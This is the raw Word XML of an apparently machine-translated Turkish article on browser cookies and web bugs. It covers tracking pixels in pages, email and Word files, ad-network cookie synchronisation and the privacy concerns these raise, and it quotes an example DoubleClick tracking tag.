        <w:t>Çerezlere İlişkin Olumsuz Konula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 teknolojisini kullanma konusundaki ana kaygılar güvenlik ve gizlilik konularıdır. Bazıları çerezlerin bir güvenlik riski, gizlilik istilası ve İnternet için tehlikeli olduğuna inanıyor. Çerezlerin etik olup olmaması, kullanıcılar hakkındaki bilgilerin nasıl toplandığına, hangi bilgilerin toplandığına ve bu bilgilerin nasıl kullanıldığına dayanır. Bir kullanıcı bir Web sitesine her giriş yaptığında, servis sağlayıcı, işletim sistemi, tarayıcı tipi, monitör özellikleri, CPU tipi, IP adresi ve en son hangi sunucunun oturum açtığı gibi bilgileri ver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lerin kötüye kullanılmasının iyi bir örneği, bir kullanıcının bir bilgisayarı diğer kullanıcılarla paylaştığı durumdur. Örneğin, bir İnternet kafede, insanlar bilgisayarın sabit diskinde depolanan son kullanıcının çerez dosyasına göz atabilir ve önceki kullanıcı hakkında hassas bilgileri potansiyel olarak açığa çıkarabilir. Bu, Web geliştiricilerin çerezleri kötüye kullanmamalarının ve bir kullanıcının çerez dosyasında hassas olabilecek bilgileri saklamamalarının kritik olmasının bir nedenidir. Birinin Sosyal Güvenlik numarası, annenin kızlık soyadı veya bir çerezdeki kredi kartı bilgileri gibi bilgileri saklamak, İnternet kullanıcıları için bir tehdittir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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lerin çevrimiçi işletmeler ve Web kullanıcıları için neler yapabileceğinin dezavantajları ve kısıtlamaları vardır. Bazı İnternet tüketicileri, çerezlerin neler yapabileceği hakkında birçok efsaneye sahiptir, bu yüzden çerezlerin yapamayacağı şeyleri belirtmek çok önemlidir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pP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Bir kullanıcının sabit diskinden bilgi çalmak veya zarar verme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Sabit diski yok edecek bitki virüsleri</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Bir siteden diğerine olan hareketleri izlemek</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İzinsiz kredi kartı numaralarını a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Kullanıcıyla başka bir bilgisayara seyahat edi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 Tüketiciler bu bilgileri sağlamadıkça isimleri, adresleri ve diğer bilgileri takip edin</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kendi isteğiyle</w:t>
      </w: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rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>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32"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Web Hata Ned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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>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Web hatası, Web sayfasını veya e-posta mesajını kimin okuduğunu izlemek için tasarlanmış bir e-posta mesajındaki bir grafiktir. Çerezler gibi, Web hataları, Web sitelerinin ve reklamverenlerin siber ortamdaki ziyaretçilerin yerlerini izlemelerine yardımcı olan elektronik etiketlerdir. Ancak, Web hataları sayfada aslında görünmez ve çok daha küçüktür - cümle sonunda dönemin büyüklüğü hakkında. Melissa virüsünün yaratıcısının izini sürmesiyle bilinen, www.privacyfoundation.org adresinin Baş Teknoloji Sorumlusu Richard Smith, Web hata tekniğini ortaya çıkarmak için kredilendirildi. Smith'e göre, “Genellikle şeffaf bir resim olarak ve yalnızca 11 piksel boyutunda ayarlanmış bir Web hatası, Web sayfasını veya e-postayı kimin okuduğunu izlemek için tasarlanmış bir Web sayfasındaki veya e-posta iletisindeki bir grafiktir. mesaj. ”Meconomy.com Baş Teknoloji Sorumlusu Craig Nathan’a göre,</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11 piksel Web hatası “bir işaret gibi, bu yüzden bir Web sayfasına her tıkladığınızda bir ping veya geri aram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unucu "Merhaba, ben buyum ve ben buyum" diyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>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Çoğu bilgisayarda, bir afiş reklamı görüntülendiğinde, bir kişinin sabit diskine yerleştirilen çerezler bulunur vey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kişi çevrimiçi bir hizmet için kaydolur. Savvy Web sörfçüleri, bir banner reklam gördüklerinde izlendiklerini biliyorlar. Ancak, insanlar Web hatalarını göremez ve çerez önleme filtreleri onları yakalamaz. Bu nedenle, Web hataları, çevrimiçi olarak banner reklamlarının bulunmadığı bölgelerde veya kişilerin izlenmesi beklenmeyen sitelerde, sörfçüleri takip ede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lastRenderedPageBreak/>
        <w:t>Bir Web böceği örneği http: www.investorplace.com adresinde bulunabilir. Adresinde bulunan bir Web hatası va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ayfanın en üstünde. Internet Explorer'da Görünüm, Kaynak veya Netscape'de Görünüm, Sayfa Kaynağı'nı seçerek görebilirsiniz</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işyerinde kod. Aşağıda gösterildiği gibi, kod “Yatırımcı Yeri” ziyaretçisi hakkında bilgi ver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reklam ajansı DoubleClick:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;IMG SRC=“http:ad.doubleclick.net/activity;src=328142;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>type=mmti; cat=invstr;ord=&lt;Time&gt;?”WIDTH=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HEIGHT=1 BORDER=0&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>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Web sayfasındaki hataları kontrol etmek de mümkündür. Sayfa yüklendikten sonra, sayfanın kaynak kodunu görüntüleyin.</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ayfada WIDTH = 1 HEIGHT = 1 BORDER = 0 (vey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GENİŞLİK = “1” YÜKSEKLİK = “1” SINIR = “0”). Bu, küçük, şeffaf bir görüntünün varlığını gösterir. Eğe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u etiketin gösterdiği görüntü, geçerli sunucudan başka bir sunucuda (yani, IMG etiketi metni</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RC = “http: //”), büyük olasılıkla bir Web hatası.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>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6"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Gizlilik ve Diğer Web Hata Sorunları</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DoubleClick veya Match Point gibi reklam ağları, İnternet’in çeşitli bölgelerinin yanı sıra, dünyanın çeşitli bölgelerinde bulunan kişilerin sayısının “bağımsız bir hesaplamasını” geliştirmek için Web hatalarını (“İnternet etiketleri” olarak da adlandırılır) kullanır belirli bir Web sitesine Reklamverenler, Web siteleri içindeki istatistiksel sayfa görünümlerini de hesaba katarlar. Bu, içeriğin etkinliğini planlama ve yönetmede çok yararlıdır, çünkü bir hedef pazar bilgisi araştırması sağlar (yani, kullanıcıların siteye yaptığı ziyaretlerin sayısı). Bu aynı</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reklam ağları, bir kişinin ziyaret ettiği sitelerin kişisel profilini oluşturmak için Web hatalarını kullanabilir. Bu bilgi</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ne tür reklamların gösterileceğini belirlemek için bir veritabanı sunucusunda depolanabilir ve çıkarıla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kullanıcı. Buna “yönlendirilmiş reklamcılık” denir.</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E-posta mesajlarında kullanılan web hataları daha da istilacı olabilir. Web tabanlı e-postada, Web hataları kullanıla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e-posta mesajının ne zaman okunup okunmadığını belirlemek için. Bir Web hatası, cihazın IP adresini sağlaya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alıcı, alıcının bu bilginin ifşa edilmesini istemesini isteyip istemediğini. Bir kuruluş içinde, bir Web hatası</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mesajın ne sıklıkla iletildiği ve okunduğu hakkında bir fikir verebilir. Bu, bir reklam kampanyasının etkinliğine ilişkin istatistikleri döndürmek için doğrudan pazarlamaya yardımcı olabilir. Web hataları, birinin önemsiz e-posta iletisini görüntüleyip görüntülemediğini tespit etmek için kullanılabilir. Bir mesajı görmeyen kişiler gelecekteki postalar için listeden çıkarıla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çerez yardımıyla, Web böceği bir makineyi, açtığı Web sayfasını, ziyaretin başladığı zamanı ve diğer ayrıntıları tanımlayabilir. Reklam hizmetleri sunan bir şirkete gönderilen bu bilgiler daha sonra satın almak üzere aynı reklam ağındaki bir başka şirket sayfasını ziyaret edip etmediğini belirlemek için kullanıla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şey ya da diğer materyalleri okumak için. DoubleClick'teki küresel teknoloji başkan yardımcısı David Rosenblatt, “Çevrimiçi mağazalarında tüketici faaliyetlerini bir araya getirmenin bir yolu” diyor. Ancak, tüketici bekçileri için,</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Web hataları ve diğer izleme araçları, çevrimiçi bilgisayar kullanıcılarının gizliliği ve özerkliği için artan bir tehdit oluşturuyo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Microsoft Word belgelerine Web hataları eklemek de mümkündür. Bir Web hatası bir yazara izin vere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belgenin nerede ve ne sıklıkla okunduğunu izleyin. Ek olarak, yazar nasıl “tıkandığını” izleye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doküman bir kişiden diğerine veya bir organizasyondan diğerine geçir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Word belgelerinde Web hatalarının olası kullanımlarından bazıları şunlardı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 Bir şirketten gizli belge sızıntılarını tespit etmek ve izlemek</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lastRenderedPageBreak/>
        <w:t>• Haber bültenlerinin ve raporların telif hakkı ihlalini izlemek</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basın bülteninin dağıtımını izlemek</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 Bir Word belgesinden yeni bir belgeye kopyalandığında metin alıntılarının izlenmesi</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Web hatalarını, Microsoft Word'deki bir belgenin bir görüntü dosyasına bağlanabilmesi için mümkün kıldığı;</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uzak bir Web sunucusunda bulunur. Çünkü Web hatalarının sadece URL'si bir belgede kayıtlı değil.</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Asıl görüntü, Microsoft Word, görüntüyü her defasında bir Web sunucusundan almalıdı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açıldı. Bu görüntü bağlama özelliği daha sonra uzaktaki bir sunucuyu ne zaman ve nerede izleyeceği konumuna getir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elge dosyası açılıyor. Sunucu, açılan bilgisayarın IP adresini ve ana bilgisayar adını bil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döküman. Bir ana bilgisayar adı genellikle bir işletmenin şirket adını içerir. Bir evin ana bilgisayar adı</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lgisayarda genellikle kullanıcının İnternet servis sağlayıcısı adı bulunur. İzin veren özelliğin kaldırılması</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Microsoft Word'deki Web görüntülerine bağlantı oluştururken, iyi bir önleyici çözüm olduğu görünmüyor. Ek olarak</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Word belgelerine, Web hataları Excel 2000 ve PowerPoint 2000 belgelerinde de kullanılabilir.</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6"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Web Hatalarının ve Çerezlerinin Senkronizasyonu</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Ek olarak, Web hataları ve tarayıcı çerezleri belirli bir e-posta adresine senkronize edilebilir. Bu numar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r Web sitesine, gelen kişilerin kimliklerini (artı onlar hakkında diğer kişisel bilgileri) tanımalarını sağla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ite daha sonraki bir tarihte. Bunu daha fazla açıklamak için, bilgisayarınıza bir çerez yerleştirildiğinde,</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aşlangıçta yerleştirilen çerez, okuyabilen tek kişidir. Teoride, iki ayrı bölge ayrı yerleştirirse</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lgisayarınızdaki benzersiz bir çerez, birbirlerinin çerezlerinde depolanan verileri okuyamazlar. Bu genellikle</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örneğin, bir site yakın zamanda diğer siteyi ziyaret ettiğinizi söyleyemez. Ancak, durum</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bilgisayarınıza yerleştirilen çerez, bu site tarafından bir siteye gönderilen bilgileri içeriyorsa, çok farklıdı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reklam ajansının sunucusu ve bu ajans her iki Web sitesi tarafından da kullanılır. Bu sitelerin her biri bir Web hatası veriyors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Her iki siteyi de her ziyaretinizde, bilgileri reklam ajansının bilgisayarına geri bildirme sayfasında,</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izinle ilgili ayrıntılar bilgisayarınızda depolanan bilgileri kullanarak reklam ajansına geri gönderilecektir.</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Her iki çerez dosyası grubuna göre. Bu, bilgisayarınızın sitelerin her birini ziyaret eden bir bilgisayar olarak tanımlanmasını sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>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Bir örnek bunu daha fazla açıklayacaktır. Web sörfçü Bob olduğunda, bir sayfa yükler veya bir e-posta açar. bir Web hatası içerir, bilgiler “şeffaf GIF” i içeren sunucuya gönderilir. Yaygın bilgiler gönderilirken, Bob’un bilgisayarının IP adresini, tarayıcı türünü, görüntülenen Web sayfasının URL’sini, görüntünün URL’sini, ve dosyanın erişildiği zaman. Ayrıca, Bob’un gizliliğini en çok tehdit edebilecek olan sunucuya potansiyel olarak gönderilmek, bilgisayarında bulunan ve önceden belirlenmiş bir çerez değeridir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Önceden varolan bir çerezin niteliğine bağlı olarak, adresinden bir sürü bilgi içerebilir. e-posta adreslerine ve kredi kartı bilgilerine kullanıcı adlarını ve şifreleri. Örneğimize devam etmek için, Bob Belirli bir reklam ajansının sunucusunda barındırılan şeffaf bir GIF içeren Web Sitesi # 1’i ziyaret ettiğinde bir çerez alabilir. Bob, aynı reklam ajansının sunucusunda barındırılan şeffaf bir GIF içeren Web Sitesi # 2'ye gittiğinde de başka bir çerez alabilir. Ardından iki Web sitesi, Bob’un etkinliğini, reklamverene rapor eden çerezler aracılığıyla çapraz referans bulabilir. Bu etkinlik devam ettikçe, reklamveren Bob’un kişisel olmayan bilgileri olarak kabul edilenleri stoklayabilir tercihler ve alışkanlıklar ve aynı zamanda, Bob’un kişisel toplanma potansiyeli var. bilgi de.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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tandart çerez kodları aracılığıyla, farklı sunucuların çerezlerini ve Web hatalarını senkronize ederek bu bilgilerin World Wide Web'de paylaşılmasını sağlaması kesinlikle teknik olarak mümkündür. Eğer bu gerçekleşirse, bir kişinin belirli bir Web sitesini ziyaret etmesi birçok İnternet’e yayılmış</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040"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552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>sunucular ve birinin gizliliğinin istilası sonsuz olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sonuç</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Çerezlerin ve Web hatalarının temelleri tanımları, içerikleri, kullanışlılığı, gizlilik kaygılarını ve senkronizasyonu içerecek şekilde sunulmuştur. Çerezlerin ve Web hatalarının gerçek kodunun birkaç örneği gösterildi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Okuyucunun onları nasıl tanımlayacağını öğrenmesine yardımcı olmak için. Çerezlerin ve Web hatalarının işletmelerdeki birçok olumlu kullanımı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>tartışılmıştır. Ayrıca, çerezler ve Web hataları ile ilgili gizlilik ve diğer konular incelenmiştir. Sonunda,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Web hatalarının ve çerezlerinin (Word belgelerinde bile) senkronizasyonu tartışıldı.</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Ancak, tartışmalarımız öncelikle yalnızca günümüzde tanımlandığı, depolandığı ve kullanıldığı için çerezler ve Web hatalarıyla sınırlandırılmıştır. Çerez ve Web böcek meta verileri (verilerle ilgili depolanan veriler) sayesind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lgisayar sistemlerinin birçok platformunda bireysel kullanıcı davranışları hakkında bilgi izlene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ir gün çerez ve Web böcek madenciliği yazılımını her türlü farklı anormalliği filtreleyen görebiliriz ve</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çerez ve Web böcek depolarından tüketici trendleri! Şimdiye kadar gördüklerimiz sadece bahşiş olabili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zdağı. (Texas A&amp;M Üniversitesi - Corpus Christi'deki MIS öğrencilerine özel teşekkürler</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Bu araştırmaya katkıları: Erik Ballenger, Cynthia Crenshaw, Robert Gaza, Jason Janacek, Russell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Laya, Brandon Manrow, Tuan Nguyen, Sergio Rios, Marco Rodriquez, Daniel Shelton ve Lynn Thornton.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Courier"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http://www.webparanoia.com/cookies.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http://theblindalley.com/webbugsinfo.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:hyperlink r:id="rId134" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
